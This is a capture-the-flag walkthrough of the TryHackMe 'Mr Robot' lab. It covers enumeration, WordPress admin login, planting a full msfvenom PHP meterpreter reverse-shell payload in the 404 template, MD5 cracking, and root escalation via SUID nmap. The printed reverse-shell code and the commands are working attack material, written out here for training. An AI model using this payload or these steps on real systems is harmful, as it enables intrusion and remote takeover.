Room Link: https://tryhackme.com/room/mrrobot
IP: 10.10.219.74
Enumeration
Nmap
# first lets run an nmap scan on the common 1000 ports
nmap 10.10.219.74 -v -A
All 1000 scanned ports on 10.10.219.74 are filtered
Nmap was not much help here. I navigated to the IP in my browser and luckily found a webserver running on port 80 with it’s own ‘terminal’ (website was styled like a terminal with some commands).
I re-ran an nmap scan just on port 80, and it returned back it is running Apache, so probably a Linux box:
nmap 10.10.219.74 -p80 -O -A
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (90%), Linux 5.4 (90%)
GoBuster – Brute Force Directory
I am going to run a gobuster scan as well just to make sure there is nothing hiding in the web directory:
gobuster dir -u 10.10.219.74 -w /usr/share/wordlists/dirb/common.txt
Meanwhile, I have played around with some of the commands in the UI of the website, I noticed whatever command you typed was posted in the url like /join
. I tried typing /ls
and got an error page for a wordpress website. So now we know we are running some variant of WordPress. When running the join command, it asks for an email. I tried setting up a temporary email box to see if anything would be sent to it, but nothing was.
Fortunately, our gobuster results finished and we got quite a lot of results:
┌──(kali㉿kali)-[~/thm]
└─$ gobuster dir -u 10.10.219.74 -w /usr/share/wordlists/dirb/common.txt 1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: <http://10.10.219.74>
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/03/31 12:48:56 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 213]
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/0 (Status: 301) [Size: 0] [--> <http://10.10.219.74/0/>]
/admin (Status: 301) [Size: 234] [--> <http://10.10.219.74/admin/>]
/atom (Status: 301) [Size: 0] [--> <http://10.10.219.74/feed/atom/>]
/audio (Status: 301) [Size: 234] [--> <http://10.10.219.74/audio/>]
/blog (Status: 301) [Size: 233] [--> <http://10.10.219.74/blog/>]
/css (Status: 301) [Size: 232] [--> <http://10.10.219.74/css/>]
/dashboard (Status: 302) [Size: 0] [--> <http://10.10.219.74/wp-admin/>]
/favicon.ico (Status: 200) [Size: 0]
/feed (Status: 301) [Size: 0] [--> <http://10.10.219.74/feed/>]
/image (Status: 301) [Size: 0] [--> <http://10.10.219.74/image/>]
/Image (Status: 301) [Size: 0] [--> <http://10.10.219.74/Image/>]
/images (Status: 301) [Size: 235] [--> <http://10.10.219.74/images/>]
/index.html (Status: 200) [Size: 1188]
/index.php (Status: 301) [Size: 0] [--> <http://10.10.219.74/>]
/js (Status: 301) [Size: 231] [--> <http://10.10.219.74/js/>]
/intro (Status: 200) [Size: 516314]
/license (Status: 200) [Size: 309]
/login (Status: 302) [Size: 0] [--> <http://10.10.219.74/wp-login.php>]
/page1 (Status: 301) [Size: 0] [--> <http://10.10.219.74/>]
/phpmyadmin (Status: 403) [Size: 94]
/rdf (Status: 301) [Size: 0] [--> <http://10.10.219.74/feed/rdf/>]
/readme (Status: 200) [Size: 64]
/robots (Status: 200) [Size: 41]
/robots.txt (Status: 200) [Size: 41]
/rss (Status: 301) [Size: 0] [--> <http://10.10.219.74/feed/>]
/rss2 (Status: 301) [Size: 0] [--> <http://10.10.219.74/feed/>]
/sitemap (Status: 200) [Size: 0]
/sitemap.xml (Status: 200) [Size: 0]
/video (Status: 301) [Size: 234] [--> <http://10.10.219.74/video/>]
/wp-admin (Status: 301) [Size: 237] [--> <http://10.10.219.74/wp-admin/>]
/wp-content (Status: 301) [Size: 239] [--> <http://10.10.219.74/wp-content/>]
/wp-config (Status: 200) [Size: 0]
/wp-includes (Status: 301) [Size: 240] [--> <http://10.10.219.74/wp-includes/>]
/wp-cron (Status: 200) [Size: 0]
/wp-load (Status: 200) [Size: 0]
/wp-links-opml (Status: 200) [Size: 227]
/wp-login (Status: 200) [Size: 2606]
/wp-mail (Status: 500) [Size: 3064]
/wp-settings (Status: 500) [Size: 0]
/wp-signup (Status: 302) [Size: 0] [--> <http://10.10.219.74/wp-login.php?action=register>]
/xmlrpc (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42]
===============================================================
2021/03/31 12:53:00 Finished
===============================================================
Gobuster Results Notes
- /admin – Redirect loop
- /sitemap & /sitemap.xml – Nothing
- /wp-login – Takes us to a wordpress login page. Inspecting the source code shows ver 4.3.1 attached to many of the CSS files, so could be a possible attack vector
- /robots.txt – We can see the location of two files, one is a key! The other seems to be some sort of dictionary / wordlist
- /phpmyadmin – We cannot login to this, but this alludes we are probably running MySQL (I reran nmap on this port and it does show as mysql, but the port is filtered)
- /rdf – some sort of feed. It does show WordPress v4.3.1 on here as well.
- /license – has a base64 encoded string hidden in source code
WP Admin Access
The /license page had a base64 encoded string that appears to be a username and password. I tested this at /wp-admin and it let’s us in! In users, we can see our account as elliot, and another account: mich05654 as a subscriber. As an admin, however, we can try and inject or upload something to give us remote access. Under Appearance > Editor > 404 template, I replaced the PHP code with a payload from msfvenom:
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.6.64.217 LPORT=4444 -4 raw -o payload.php
cat payload.php
/*<?php /**/ error_reporting(0); $ip = '10.6.64.217'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
Now we need to start metasploit up to intercept the meterpreter shell
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.6.64.217
set LPORT 4444
run
Now all we have to do is navigate to /404.php and we receive a hit back on our console! Run shell
to gain shell access.
Perusing around, there is a robot user under /home/robot that has key-2-of-3.txt and also the password for the robot account with an md5 hash.
Let’s crack it with John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt robot.txt --format="Raw-MD5"
<redacted> (robot)
Great! We got his password. But if we try to su robot
, it tells us we need to run it from a terminal. We need to spawn a bash terminal and we can do that like so:
python -c 'import pty; pty.spawn("/bin/bash")'
And now we can su robot
and grab the flag!
PrivEsc
I can only assume the last flag is under the root home directory, so let’s see how to privesc.
I ran this command to find any binaries we can exploit:
find / -type f -a \\( -perm -u+s -o -perm -g+s \\) -exec ls -l {} \\; 2> /dev/null
And one interesting one with a root SUID set is /usr/local/bin/nmap. I looked up nmap on GTFOBins and it says we can spawn an interactive shell using nmap --interactive
and then run !sh
It worked! Running whoami
shows we are root and the third flag is in the root directory!
Comments
No comments available.